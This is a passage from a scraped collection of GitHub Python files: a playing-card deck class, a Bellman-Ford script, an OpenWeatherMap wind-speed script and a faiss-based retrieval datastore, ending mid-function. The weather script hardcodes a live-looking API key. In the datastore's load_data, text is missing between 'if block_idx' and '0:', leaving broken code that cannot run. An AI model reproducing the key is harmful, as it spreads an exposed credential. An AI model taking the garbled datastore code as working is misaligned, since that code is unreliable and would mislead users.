vis","repo_name":"RonakSharma1/Image_Stitching","sub_path":"ImageStitching.py","file_name":"ImageStitching.py","file_ext":"py","file_size_in_byte":5211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15749157834","text":"\"\"\"\nContains the code for Deck_Cards\nwill be used in many card games in parent folder (eventually)\nby: patjcolon\nLast updated: 6/28/2023\n\"\"\"\nfrom random import shuffle, choice\nfrom helper_modules import styl\n\nrst = styl.unstyl()\nyB = styl.styl(\"Yellow\", \"Bold\")\ngB = styl.styl(\"Yellow\", \"Bold\")\n\n# ysw: \"Red Bold White\"\nreds = styl.styl(\"Red\", \"Bold\", \"White\")\n# ysw: \"Black Bold White\"\nblks = styl.styl(\"Black\", \"Bold\", \"White\")\n\n\nclass Deck_Cards(): # WIP : error handling, card object creation\n \"\"\"Handles creation, management and deletion of all decks and their contents\"\"\"\n\n# ====================================================================\n# || Object Initialization, Deletion, and asString Functions: ||\n# ====================================================================\n def __init__(self, starting_decks: int = 1):\n \"\"\"Creates starting_decks amount of decks, minimum 1.\n Creates self.card_count and self.number_of_sets for tracking purposes.\"\"\"\n self.card_count = 0\n self.number_of_sets = 0\n self.external_sets_added = 0\n self.new_deck()\n\n # Additional starting decks created only at initialization.\n self.starting_decks = starting_decks\n extra_decks_left = starting_decks - 1\n if extra_decks_left > 0:\n extra_decks_left -= 1\n self.combine_decks(False, extra_decks_left, False, True)\n # resetting this value changed by combine decks, as initial decks don't count as external\n self.external_sets_added = 0\n extra_decks_left = 0\n\n def __del__(self):\n del self.diamonds, self.clubs, self.hearts, self.spades\n del self.deck\n del self.card_count\n del self.number_of_sets\n del self\n\n def __str__(self) -> str:\n return f\"This is a deck containing {self.card_count} cards.\"\n\n# ====================================================================\n# || Object Testing Functions: ||\n# ====================================================================\n def test_deck(self, test_selection: str = \"ALL\", test_cycles: int = 1, deck_combining_test: object = False):\n \"\"\"Tests variables and methods to ensure deck is functioning as intended. Defaults: Running \"ALL\" tests, 1 time, with a random new deck used in the combination\n test_selection Options: \"ALL\", \"CURRENT\", \"NEW\", \"CLEAR\", \"COMBINE\"\n \"ALL\": Performs all tests\n \"CURRENT\": Performs tests on deck as is\n \"NEW\": Runs self.new_deck and performs tests on new deck\n \"CLEAR\": Runs self.clear_deck and performs tests on cleared deck\n \"COMBINE\": Runs self.combine_decks and performs tests on combination deck\n \"SHUFFLE\": Runs self.shuffle_deck and performs tests on shuffled deck\n test_cycles: Runs iterates through test this many times\n deck_combining_test = deck that will be used in self.combine_decks. If true: use new_deck in combination. False will not combine a deck; default False\"\"\"\n test_selection = test_selection.upper()\n self.test_cycles = test_cycles\n self.tests_ran = 0\n self.deck_combining_test = deck_combining_test\n done_testing = False\n\n def tests_performed():\n \"\"\"Tests performed in every deck test\"\"\"\n print(f\"{gB}(Test #1){yB} -----> {rst}\" +\n f\"Sets: {self.number_of_sets} Cards: {self.card_count} Starting Decks: {self.starting_decks}\")\n\n print(f\"{gB}(Test #2){yB} -----> {rst}\" +\n f\"Diamonds: {self.diamonds}, Clubs: {self.clubs} Hearts: {self.hearts} Spades: {self.spades}\")\n\n print(f\"{gB}(Test #3){yB} -----> {rst}\" +\n f\"Deck: {self.deck}\")\n self.tests_ran += 1\n print(f\"\\n{yB}+-{gB}< Test Cycle #{self.tests_ran} DONE >{yB}--------------------------------------+{rst}\\n\\n\")\n\n def current_deck_tests():\n \"\"\"Performs tests on current deck as is\"\"\"\n print(\n f\"{yB}--------------------------------------------------------------------\")\n print(\n f\"| -{rst}(CURRENT DECK STATS){yB}----- |\")\n print(\n f\"--------------------------------------------------------------------{rst}\")\n tests_performed()\n\n def new_deck_tests():\n \"\"\"Runs self.new_deck and performs tests on new deck\"\"\"\n print(\n f\"{yB}--------------------------------------------------------------------\")\n print(\n f\"| -{rst}(NEW DECK STATS){yB}----- |\")\n print(\n f\"--------------------------------------------------------------------{rst}\")\n self.new_deck()\n tests_performed()\n\n def clear_deck_tests():\n \"\"\"Runs self.clear_deck and performs tests on cleared deck\"\"\"\n print(\n f\"{yB}--------------------------------------------------------------------\")\n print(\n f\"| -{rst}(CLEAR DECK STATS){yB}----- |\")\n print(\n f\"--------------------------------------------------------------------{rst}\")\n self.clear_deck()\n tests_performed()\n\n def combine_decks_tests(deck_combining_test: object = self.deck_combining_test):\n \"\"\"Runs self.combine_decks and performs tests on combination deck\"\"\"\n print(\n f\"{yB}--------------------------------------------------------------------\")\n print(\n f\"| -{rst}(COMBINE DECKS STATS){yB}----- |\")\n print(\n f\"--------------------------------------------------------------------{rst}\")\n self.combine_decks(deck_combining_test)\n tests_performed()\n\n def shuffle_deck_tests():\n \"\"\"Runs self.shuffle_deck and performs tests on shuffled deck\"\"\"\n print(\n f\"{yB}--------------------------------------------------------------------\")\n print(\n f\"| -{rst}(SHUFFLE DECK STATS){yB}----- |\")\n print(\n f\"--------------------------------------------------------------------{rst}\")\n self.shuffle_deck()\n tests_performed()\n\n def random_deck_test():\n \"\"\"Runs any style test at random\"\"\"\n choice(self.all_tests_list)()\n\n def run_all_tests():\n \"\"\"Performs all tests in random order\"\"\"\n print(\n f\"{yB}====================================================================\")\n print(\n f\"|| ={gB}[ RUNNING ALL DECK TESTS ]{yB}===== ||\")\n print(\n f\"===================================================================={rst}\")\n all_tests_list = self.all_tests_list\n number_of_tests = len(all_tests_list)\n\n while number_of_tests > 0:\n number_of_tests -= 1\n random_test = choice(all_tests_list)\n random_test()\n all_tests_list.remove(random_test)\n\n # Used in run_all_tests and random_deck_test\n self.all_tests_list = [current_deck_tests, new_deck_tests,\n clear_deck_tests, combine_decks_tests, shuffle_deck_tests]\n # Runs test selected for as many intervals as specified:\n while test_cycles > 0:\n test_cycles -= 1\n done_testing = False\n if test_selection == \"ALL\": # Runs all deck tests in random order\n run_all_tests()\n elif test_selection == \"CURRENT\": # Runs current deck tests\n current_deck_tests()\n elif test_selection == \"NEW\": # Runs new deck tests\n new_deck_tests()\n elif test_selection == \"CLEAR\": # Runs clear deck tests\n clear_deck_tests()\n elif test_selection == \"COMBINE\": # Runs combine decks tests\n combine_decks_tests()\n elif test_selection == \"SHUFFLE\": # Runs shuffle deck tests\n shuffle_deck_tests()\n elif test_selection == \"RANDOM\": # Runs a randomly selected deck tests function\n random_deck_test()\n else: # test_selection not listed - breakout of cycles loop\n print(\"Test selection invalid. Terminating testing objects.\")\n test_cycles = 0\n # Testing complete, call objects cleanup\n done_testing = True\n\n # Testing objects cleanup\n if done_testing:\n del self.test_cycles\n del self.tests_ran\n del self.deck_combining_test\n return print(\"Testing completed. Testing objects deleted.\")\n # Testing cleanup failed\n return print(\"Testing cleanup failed to run.\")\n\n\n# ====================================================================\n# || Deck Management Functions: ||\n# ====================================================================\n\n def new_deck(self):\n \"\"\"Declares/Resets self.deck and a self.suit for diamonds, clubs, hearts, and spades.\n Declares: Used when initialized to create values and new deck.\n Resets: Can be manually called at any point to reset deck to 1 fresh, unshuffled deck of 52 cards.\"\"\"\n self.deck = []\n self.diamonds = [\"AD\", \"2D\", \"3D\", \"4D\", \"5D\", \"6D\",\n \"7D\", \"8D\", \"9D\", \"10D\", \"JD\", \"QD\", \"KD\"]\n self.clubs = [\"AC\", \"2C\", \"3C\", \"4C\", \"5C\", \"6C\",\n \"7C\", \"8C\", \"9C\", \"10C\", \"JC\", \"QC\", \"KC\"]\n self.hearts = [\"AH\", \"2H\", \"3H\", \"4H\", \"5H\", \"6H\",\n \"7H\", \"8H\", \"9H\", \"10H\", \"JH\", \"QH\", \"KH\"]\n self.spades = [\"AS\", \"2S\", \"3S\", \"4S\", \"5S\", \"6S\",\n \"7S\", \"8S\", \"9S\", \"10S\", \"JS\", \"QS\", \"KS\"]\n self.deck.extend(self.diamonds + self.clubs +\n self.hearts + self.spades)\n self.card_count = 52\n self.number_of_sets = 1\n\n def clear_deck(self):\n \"\"\"Clears every list and sets every value to 0. Does not delete object.\"\"\"\n self.deck.clear()\n self.diamonds.clear()\n self.clubs.clear()\n self.hearts.clear()\n self.spades.clear()\n self.card_count = 0\n self.number_of_sets = 0\n\n def shuffle_deck(self):\n \"\"\"Shuffles self.deck using random.shuffle()\"\"\"\n shuffle(self.deck)\n\n def combine_decks(self, other_deck: object = False, extra_decks: int = 0, shuffle_decks: bool = True, create_new_deck: bool = False):\n \"\"\"Takes other_deck.deck and combines it to this deck.\n\n For every 1 in extra_decks: runs combine_decks again (defaulting to new_deck)\n Ex: combine_decks(deck2, 3) will first combine self.deck and deck2, then it will add 3 more new decks, shuffling each time.\n\n Will shuffle_deck() if shuffle_decks is True, otherwise will add new decks to bottom.\n\n If create_new_deck True, creates a new deck to combine instead.\n Default is False. If no deck is entered, switches to True\"\"\"\n if not other_deck:\n create_new_deck = True\n if create_new_deck == True:\n del other_deck\n other_deck = Deck_Cards()\n\n self.deck.extend(other_deck.deck)\n self.diamonds.extend(other_deck.diamonds)\n self.clubs.extend(other_deck.clubs)\n self.hearts.extend(other_deck.hearts)\n self.spades.extend(other_deck.spades)\n\n self.card_count = len(self.deck)\n self.number_of_sets += 1\n self.external_sets_added += 1\n del other_deck\n\n if shuffle_decks:\n self.shuffle_deck()\n if extra_decks > 0:\n extra_decks -= 1\n self.combine_decks(False, extra_decks, shuffle_decks, True)\n\n# def combine_hands() # <===================== TEST TESTING TEMPORARY 123============================\n\n# ====================================================================\n# || Card Management Functions: ||\n# ====================================================================\n def remove_card(self, card_removed: str):\n \"\"\"Helper function to update self.deck and suits\"\"\"\n self.deck.remove(card_removed)\n self.card_count -= 1\n\n card_suit = card_removed[-1]\n if card_suit == 'D':\n self.diamonds.remove(card_removed)\n\n elif card_suit == 'C':\n self.clubs.remove(card_removed)\n\n elif card_suit == 'H':\n self.hearts.remove(card_removed)\n\n elif card_suit == 'S':\n self.spades.remove(card_removed)\n\n def draw(self, draw_type: str = \"TOP\", peek: bool = False):\n \"\"\"Contains all draw functions.\"\"\"\n draw_type = draw_type.upper()\n\n def specific_card(specific_card: str = '') -> str:\n \"\"\"Returns specific card if in deck, updates self.deck and suits\n Returns False if card not in deck.\"\"\"\n if self.card_count == 0:\n print(\"There are no cards left.\")\n return False\n elif specific_card in self.deck:\n if self.card_count == 1:\n print(f\"This is the last card in the deck.\")\n self.remove_card(specific_card)\n return specific_card\n elif specific_card:\n print(\"Card is not in deck.\")\n return False\n print(\"What card would you like?\")\n return False\n\n def from_top(peek: bool = False) -> str:\n \"\"\"Returns card from top of deck, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n if self.card_count == 0:\n print(\"There are no cards left.\")\n return False\n drawn_card = self.deck[0]\n if self.card_count == 1:\n print(f\"This is the last card in the deck.\")\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_bottom(peek: bool = False) -> str:\n \"\"\"Returns card from bottom of deck, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n if self.card_count == 0:\n print(\"There are no cards left.\")\n return False\n drawn_card = self.deck[-1]\n if self.card_count == 1:\n print(f\"This is the last card in the deck.\")\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_random(peek: bool = False) -> str:\n \"\"\"Returns card from random location in deck, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n if self.card_count == 0:\n print(\"There are no cards left.\")\n return False\n drawn_card = choice(self.deck)\n if self.card_count == 1:\n print(f\"This is the last card in the deck.\")\n if not peek:\n self.deck.remove(drawn_card)\n return drawn_card\n\n def from_diamonds(peek: bool = False) -> str:\n \"\"\"Returns card from random location in diamonds, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n if self.card_count == 0:\n print(\"There are no cards left.\")\n return False\n drawn_card = choice(self.diamonds)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_clubs(peek: bool = False) -> str:\n \"\"\"Returns card from random location in clubs, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n drawn_card = choice(self.clubs)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_hearts(peek: bool = False) -> str:\n \"\"\"Returns card from random location in hearts, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n drawn_card = choice(self.hearts)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n def from_spades(peek: bool = False) -> str:\n \"\"\"Returns card from random location in spades, updates self.deck and suits\n peek: Does not remove card if True (default False)\"\"\"\n drawn_card = choice(self.spades)\n if not peek:\n self.remove_card(drawn_card)\n return drawn_card\n\n from_where = {\n \"TOP\": from_top,\n \"BOTTOM\": from_bottom,\n \"RANDOM\": from_random,\n \"DIAMONDS\": from_diamonds,\n \"CLUBS\": from_clubs,\n \"HEARTS\": from_hearts,\n \"SPADES\": from_spades\n }\n\n if draw_type not in from_where:\n return specific_card(draw_type)\n return from_where[draw_type]()\n","repo_name":"patjcolon/card_games","sub_path":"classes/decks.py","file_name":"decks.py","file_ext":"py","file_size_in_byte":17440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"93034929","text":"import math\nfrom prettytable import PrettyTable\n\ndef BellmanFord(adj, start):\n Vsize = len(adj)\n dist = [math.inf] * Vsize\n dist[start] = 0\n for i in range(Vsize - 1):\n for u in range(Vsize):\n for v in range(Vsize):\n if adj[u][v] != 0:\n if dist[u] != math.inf and dist[u] + adj[u][v] < dist[v]:\n dist[v] = dist[u] + adj[u][v]\n return dist\n\n\ncheck = input('Хотите ввести матрицу вручную(Да/Нет)?: ')\nif check == 'Да':\n V = input('Введите названия вершин:\\t').split() # названия вершин\n E = [] # массив рёбер\n eCount = int(input('Введите количество ребер:\\t')) # количество рёбер\n for edge in range(eCount):\n e = input('Введите начало, конец ребра и вес через пробел:\\t').split()\n if len(e) != 3: # проверка ошибок ввода\n print('Неверное количество данных')\n edge -= 1\n continue\n e = {'start': e[0], 'end': e[1], 'weight': int(e[2])}\n E.append(e)\n adjMatrix = [[0 for i in range(len(V))] for i in range(len(V))]\n for edge in E:\n adjMatrix[V.index(edge['start'])][V.index(edge['end'])] = edge['weight']\n adjMatrix[V.index(edge['end'])][V.index(edge['start'])] = edge['weight']\n\nadjTable = PrettyTable(['-'] + [i for i in V])\nfor i in range(len(adjMatrix)):\n adjTable.add_row([V[i]] + adjMatrix[i])\nprint(adjTable)\n\ndistTable = PrettyTable(['-'] + [i for i in V])\nfor i in range(len(adjMatrix)):\n distTable.add_row([V[i]] + BellmanFord(adjMatrix, i))\nprint(distTable)\n","repo_name":"AGaziev/graphTheory","sub_path":"shortPaths.py","file_name":"shortPaths.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43083818791","text":"import requests\r\n\r\ncity = \"Moscow,RU\"\r\nappid = \"5f90996e12146e1a6fd86b5087ce1ddf\"\r\nres = requests.get(\"http://api.openweathermap.org/data/2.5/weather\",\r\n params={'q': city, 'units': 'metric', 'lang': 'ru', 'APPID': appid})\r\ndata = res.json()\r\nprint(\"Прогноз скорости ветра и видимости на сегодня\")\r\nprint('Cкорость ветра: ', data['wind']['speed'], ' м/с')\r\nprint(\"Видимость: \", (data['visibility'] / 10000) * 100, '%')\r\nprint('$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$')\r\n","repo_name":"ParfilovSergey/weather","sub_path":"лз2-дз1.py","file_name":"лз2-дз1.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2052258771","text":"import argparse\nimport os\nimport numpy as np\nimport json\nimport torch\nimport faiss\nimport time\nimport glob\nimport pickle as pkl\n\nfrom tqdm import tqdm\nfrom scipy.special import log_softmax\n\nfrom collections import defaultdict, Counter\n\n#import tracemalloc\nimport os\nimport psutil\n# tracemalloc.start()\npid = os.getpid()\npython_process = psutil.Process(pid)\n\ndef print_mem_use():\n #memUse = tracemalloc.get_traced_memory()[1]/(1024*1024*1024)\n memUse = python_process.memory_info()[0]/2.**30 # memory use in GB...I think\n print('memory use: %.1fGB' % memUse)\n\ndef load_embs(embed_path, dstore_size, dimension):\n assert os.path.exists(embed_path), embed_path\n return np.memmap(embed_path,\n dtype=np.float16,\n mode=\"r\",\n shape=(dstore_size, dimension))\n\nclass DataStore(object):\n def __init__(self,\n setting=None,\n data_path=None,\n model_dir=None,\n do_load_data=True,\n do_load_embeds=True,\n do_load_index=True,\n dimension=1024,\n ncentroids=4096,\n code_size=64,\n probe=8,\n num_keys_to_add_at_a_time=1000000,\n remove_stopwords=False,\n remove_stopwords_except_k=None,\n restricted=None,\n consider_string_boundary=True,\n cuda=True,\n embs_consider_boundary=False,\n keep_uint8=False\n ):\n\n base_dir = \"corpus\"\n if setting in [\"enwiki-0\", \"enwiki-2022-0\"]:\n data_path = os.path.join(base_dir, setting[:-2], \"0.npy\")\n if model_dir is not None:\n model_dir = os.path.join(model_dir, setting)\n elif setting in [\"enwiki\", \"enwiki-2022\"]:\n data_path=[os.path.join(base_dir, setting, \"{}.npy\".format(idx)) for idx in range(20)]\n if model_dir is not None:\n model_dir=[os.path.join(model_dir, \"{}-{}\".format(setting, idx)) for idx in range(20)]\n ncentroids *= 8\n elif setting in [\"cc_news\", \"imdb\", \"amazon\", \"subj\"]:\n data_path = os.path.join(base_dir, setting, \"text.npy\")\n if model_dir is not None:\n model_dir = os.path.join(model_dir, setting)\n else:\n raise NotImplementedError(setting)\n\n assert not (remove_stopwords and remove_stopwords_except_k)\n\n self.setting = setting\n self.dimension = dimension\n self.ncentroids = ncentroids\n self.code_size = code_size\n self.probe = probe\n self.num_keys_to_add_at_a_time = num_keys_to_add_at_a_time\n self.remove_stopwords = remove_stopwords\n self.remove_stopwords_except_k = remove_stopwords_except_k\n self.restricted = restricted\n self.consider_string_boundary = consider_string_boundary\n self.cuda = cuda\n self.embs_consider_boundary = embs_consider_boundary\n self.keep_uint8 = keep_uint8\n\n '''\n restricted can be either\n - an instance of the class `Task`\n - a list of integers: a list of block indices you will be restricted to\n - a list of strings: a list of inputs, if these are all you will use, so that a list of\n block indices can be computed offline\n - a dictionary: string->a list of intergers, precomputed BM25 block indices\n - True: meaning you will use restricted search but on the fly. this will load all the embeddings\n - False or None: you will not use restricted search\n '''\n\n if self.restricted:\n from npm.searcher import BM25Searcher\n data_dir = os.path.join(base_dir, setting)\n index_dir = os.path.join(base_dir, setting + \"-index\")\n self.searcher = BM25Searcher(data_dir, index_dir)\n self.restricted, self.restricted_dict = self.searcher.batch_search(self.restricted)\n\n self.load_restricted = self.restricted and type(self.restricted)!=bool\n print (\"load_restricted:\", self.load_restricted)\n\n if do_load_data:\n self.load_data(data_path)\n\n print_mem_use()\n\n if do_load_embeds:\n assert model_dir is not None\n assert do_load_data\n self.load_embeds(model_dir)\n\n print_mem_use()\n\n if do_load_index:\n assert model_dir is not None\n self.load_index(model_dir)\n\n def load_stopwords(self):\n if self.remove_stopwords or self.remove_stopwords_except_k:\n stopwords = set()\n with open(os.path.join(\"config\", \"roberta_stopwords.txt\")) as f:\n for line in f:\n stopwords.add(int(line.strip()))\n else:\n stopwords = None\n return stopwords\n\n def load_data(self, data_path):\n self.input_ids = []\n self.token_idx_to_block_idx = []\n self.token_idx_to_local_idx = []\n self.emb_token_idx_to_orig_block_idx = []\n self.orig_block_idx_to_emb_token_idx = []\n\n # for debugging, later we can delete this\n self.orig_block_idx_to_valid_start = {}\n self.orig_block_idx_to_valid_end = {}\n\n stopwords = self.load_stopwords()\n dstore_size_list = []\n\n if type(data_path)==list:\n data_paths = data_path\n else:\n data_paths = [data_path]\n\n offset = 0\n global_dstore_size = 0\n global_true_dstore_size = 0\n true_dstore_size_list = []\n\n if self.load_restricted:\n self.orig_emb_token_indices_valid = set()\n\n print_mem_use()\n\n for data_path_idx, _data_path in enumerate(data_paths):\n input_ids = np.load(_data_path)\n\n start_end_pairs = np.load(_data_path.replace(\".npy\", \"_blocks.npy\"))\n if self.consider_string_boundary:\n with open(_data_path.replace(\".npy\", \"_valid.pkl\"), \"rb\") as f:\n valid_candidates = pkl.load(f)\n\n dstore_size = 0\n true_dstore_size = 0\n offset_block = 0 if self.input_ids is None else len(self.input_ids)\n\n remove_stopwords = self.remove_stopwords or (\n self.remove_stopwords_except_k is not None and data_path_idx >= self.remove_stopwords_except_k)\n\n for block_idx, (valid_start, valid_end) in enumerate(tqdm(valid_candidates)):\n start = start_end_pairs[block_idx]\n end = start_end_pairs[block_idx+1] if block_idx0:\n valid_start = np.array([idx for idx in valid_start if idx not in stopword_indices], dtype=np.uint8)\n valid_end = np.array([idx for idx in valid_end if idx not in stopword_indices], dtype=np.uint8)\n self.orig_block_idx_to_valid_start[offset] = valid_start\n self.orig_block_idx_to_valid_end[offset] = valid_end\n\n dstore_size += curr_dstore_size\n global_dstore_size += curr_dstore_size\n if is_valid:\n true_dstore_size += curr_dstore_size\n global_true_dstore_size += curr_dstore_size\n self.input_ids.append(curr_input_ids)\n offset += 1\n\n dstore_size_list.append(dstore_size)\n true_dstore_size_list.append(true_dstore_size)\n print (\"Finished reading %.3fM tokens from %s\" % (dstore_size/1000000, _data_path))\n print_mem_use()\n\n self.orig_block_idx_to_emb_token_idx.append(global_true_dstore_size)\n\n self.token_idx_to_block_idx = np.array(self.token_idx_to_block_idx)\n self.token_idx_to_local_idx = np.array(self.token_idx_to_local_idx, dtype=np.uint8)\n self.dstore_size_list = dstore_size_list\n self.dstore_size = np.sum(dstore_size_list)\n self.true_dstore_size_list = true_dstore_size_list\n self.true_dstore_size = np.sum(true_dstore_size_list)\n\n def load_embeds(self, model_dir):\n if type(model_dir)==list:\n self.embs = []\n for shard_idx, (_model_dir, dstore_size) in enumerate(zip(model_dir, self.dstore_size_list)):\n remove_stopwords = self.remove_stopwords or (\n self.remove_stopwords_except_k is not None and shard_idx >= self.remove_stopwords_except_k)\n postfix = \"_wo_stopwords\" if remove_stopwords else \"\"\n embed_path = os.path.join(_model_dir,\n \"embeddings{}.float16.npy\".format(postfix))\n print (\"Start loading the embed from %s with (%d, %d)...\" % (embed_path.split(\"/\")[-2], dstore_size, self.dimension))\n curr_emb = load_embs(embed_path, dstore_size, self.dimension)\n self.embs.append(curr_emb)\n else:\n postfix = \"_wo_stopwords\" if self.remove_stopwords else \"\"\n embed_path = os.path.join(model_dir, \"embeddings{}.float16.npy\".format(postfix))\n print (\"Start loading the embed with (%d, %d)...\" % (self.dstore_size, self.dimension))\n self.embs = load_embs(embed_path, self.dstore_size, self.dimension)\n\n if self.load_restricted:\n if type(self.embs)==list:\n offset = 0\n for i, (emb, dstore_size) in enumerate(zip(self.embs, self.dstore_size_list)):\n assert i>0 or offset==0\n curr_restricted = sorted([j-offset for j in self.orig_emb_token_indices_valid\n if offset<=j0:\n curr_restricted = np.array(curr_restricted)\n self.embs[i] = emb[curr_restricted]\n assert self.embs[i].shape[0]==self.true_dstore_size_list[i]\n else:\n assert self.true_dstore_size_list[i]==0\n offset += dstore_size\n\n assert np.sum([emb.shape[0] for emb in self.embs])==self.true_dstore_size\n else:\n self.embs = self.embs[sorted(self.orig_emb_token_indices_valid)]\n assert self.embs.shape[0]==len(self.orig_emb_token_indices_valid)==self.true_dstore_size\n print (\"Finished loading embs.shape=%s\" % str(self.embs.shape))\n\n def load_index(self, model_dir):\n if type(model_dir)==list:\n model_dir = model_dir[-1] + \".combined\"\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n index_path = os.path.join(model_dir.replace(\"*\", \"\"),\n \"embeddings{}.faiss_index_IP\".format(\"_wo_stopwords\" if self.remove_stopwords else \"\"))\n print (\"Starting loading %s\" % index_path)\n\n if os.path.exists(index_path):\n self.index = faiss.read_index(index_path)\n self.index.nprobe = self.probe\n else:\n print (\"No index found from %s -- start building index!\" % index_path)\n if not os.path.exists(index_path + \".trained\"):\n self._train_index(index_path)\n self.index = self._add_keys(index_path)\n\n def get_embs(self, indices):\n if type(self.embs)==list:\n if type(indices) in [int, np.int64]:\n offset = 0\n for idx, dstore_size in enumerate(self.true_dstore_size_list):\n if offset <= indices < offset+dstore_size:\n return self.embs[idx][indices-offset].astype(np.float32)\n offset += dstore_size\n # it should be returned\n raise NotImplementedError()\n else:\n embs = []\n for _indices in indices:\n embs.append(self.get_embs(_indices))\n return np.stack(embs, 0)\n\n return self.embs[indices].astype(np.float32)\n\n def get_block_idx_and_token(self, i, token_only=False):\n if type(i)==list:\n return [self.get_block_idx_and_token(j, token_only=token_only) for j in i]\n if token_only:\n return self._get_token(i)[1]\n return self._get_token(i)\n\n def get_context(self, i, decode_func):\n if type(i)==list:\n return [self.get_context(j, decode_func) for j in i]\n\n block_i, token_i = self.token_idx_to_block_idx[i], self.token_idx_to_local_idx[i]\n input_ids = self.input_ids[block_i]\n #input_ids = self.blocks[block_i][\"input_ids\"]\n return decode_func(input_ids, token_i)\n\n def get_frequency(self, tokens):\n return [self.token_counter.get(token, 0) for token in tokens]\n\n def search(self, query_embs, k=4096):\n all_scores, all_indices = self.index.search(query_embs.astype(np.float32), k)\n return all_scores, all_indices\n\n def get_knn_scores(self, query_emb, indices, distance_type=\"l2\", temperature=1.0):\n '''\n query_emb: [batch_size, dimension]\n indices: [batch_size, k]\n self.get_embs(indices): [batch_size, k, dimension]\n distances: [batch_size, k]\n '''\n scores = np.squeeze(np.matmul(\n self.get_embs(indices), np.expand_dims(query_emb, -1)), -1)\n scores /= np.sqrt(self.dimension)\n knn_scores = np.exp(scores / temperature)\n return knn_scores\n\n def get_prediction_and_knn_prob(self,\n knn_scores,\n indices,\n gt_token,\n gt_token_idx=None,\n exclude_level=None):\n '''\n gt_token_idx and exclude_level are only specified\n if the evaluation data and the corpus data are the same\n '''\n if gt_token_idx is not None and exclude_level is not None:\n assert exclude_level in [\"token\", \"block\", \"doc\"]\n gt_block, _gt_token = self.get_block_idx_and_token(gt_token_idx)\n assert gt_token==_gt_token\n else:\n assert gt_token_idx is None and exclude_level is None\n\n score_per_token = self.init_score_per_token.copy()\n included_tokens = set()\n tot = self.init_score_sum\n for idx, knn_score in zip(indices, knn_scores):\n block, pred = self._get_token(idx)\n if pred==\"EOS\":\n continue\n if exclude_level is not None:\n if exclude_level==\"token\" and idx==gt_token_idx:\n continue\n elif exclude_level==\"block\" and gt_block==block:\n continue\n elif exclude_level==\"doc\" and self.block_idx_to_doc_idx[block]==self.block_idx_to_doc_idx[gt_block]:\n continue\n included_tokens.add(pred)\n score_per_token[pred] += knn_score\n tot += knn_score\n\n sorted_tokens = sorted(included_tokens, key=lambda x: -score_per_token[x])\n knn_prob = score_per_token[gt_token] / tot\n return sorted_tokens, np.log(knn_prob)\n\n def _get_token(self, token_idx):\n block_i, token_i = self.token_idx_to_block_idx[token_idx], self.token_idx_to_local_idx[token_idx]\n input_ids = self.input_ids[block_i]\n assert token_i < len(input_ids)\n token_i = input_ids[token_i]\n return block_i, token_i\n\n def _get_token_position(self, token_idx, ngram_before=1, ngram_after=1):\n if type(token_idx)==list:\n return [self._get_token_position(_token_idx,\n ngram_before=ngram_before,\n ngram_after=ngram_after)\n for _token_idx in token_idx]\n block_i, token_i = self.token_idx_to_block_idx[token_idx], self.token_idx_to_local_idx[token_idx]\n #input_ids = self.blocks[block_i][\"input_ids\"]\n input_ids = self.input_ids[block_i]\n assert token_i < len(input_ids)\n\n if ngram_before==1:\n # just take ngram after this\n token_range = [token_i]\n for j in range(token_i+1, min(len(input_ids), token_i+ngram_after)):\n if input_ids[j] in [0, 2]:\n break\n token_range.append(j)\n elif ngram_after==1:\n token_range = [token_i]\n for j in range(token_i-1, max(0, token_i-ngram_before+1), -1):\n if input_ids[j] in [0, 2]:\n break\n token_range = [j] + token_range\n else:\n raise NotImplementedError()\n\n assert np.all([i+1==j for i, j in zip(token_range, token_range[1:])])\n return block_i, token_range, [input_ids[i] for i in token_range]\n\n def _train_index(self, index_path):\n start = time.time()\n quantizer = faiss.IndexFlatIP(self.dimension)\n start_index = faiss.IndexIVFPQ(quantizer,\n self.dimension,\n self.ncentroids,\n self.code_size,\n 8)\n start_index.nprobe = self.probe\n np.random.seed(1)\n\n print (\"Sampling for training the index (from %d tokens)\" % (self.true_dstore_size))\n if type(self.embs)==list:\n sampled_embs = []\n for emb in tqdm(self.embs):\n sampled_indices = np.random.choice(np.arange(emb.shape[0]),\n size=[min(1000000, emb.shape[0])],\n replace=False)\n sampled_embs.append(emb[sampled_indices])\n print (\"Finish sampling; now concatenating...\")\n sampled_embs = np.concatenate(sampled_embs, 0).astype(np.float32)\n else:\n random_sample = np.random.choice(np.arange(self.true_dstore_size),\n size=[min(1000000, self.true_dstore_size)],\n replace=False)\n sampled_embs = self.get_embs(random_sample) # already converted into float32\n\n print (\"Training examples sampled; now start training...\")\n\n if self.cuda:\n # Convert to GPU index\n res = faiss.StandardGpuResources()\n co = faiss.GpuClonerOptions()\n co.useFloat16 = True\n gpu_index = faiss.index_cpu_to_gpu(res, 0, start_index, co)\n gpu_index.verbose = False\n\n # Train on GPU and back to CPU\n gpu_index.train(sampled_embs)\n start_index = faiss.index_gpu_to_cpu(gpu_index)\n else:\n # Faiss does not handle adding keys in fp16 as of writing this.\n start_index.train(sampled_embs)\n\n print ('Training took {} s'.format(time.time() - start))\n faiss.write_index(start_index, index_path + \".trained\")\n\n def _add_keys(self, index_path):\n index = faiss.read_index(index_path + \".trained\")\n start_time = time.time()\n\n if type(self.embs)==list:\n tot = 0\n for i, emb in enumerate(self.embs):\n dstore_size = emb.shape[0]\n start = 0\n while start < dstore_size:\n end = min(dstore_size, start + self.num_keys_to_add_at_a_time)\n to_add = self.get_embs(range(start, end), i)\n 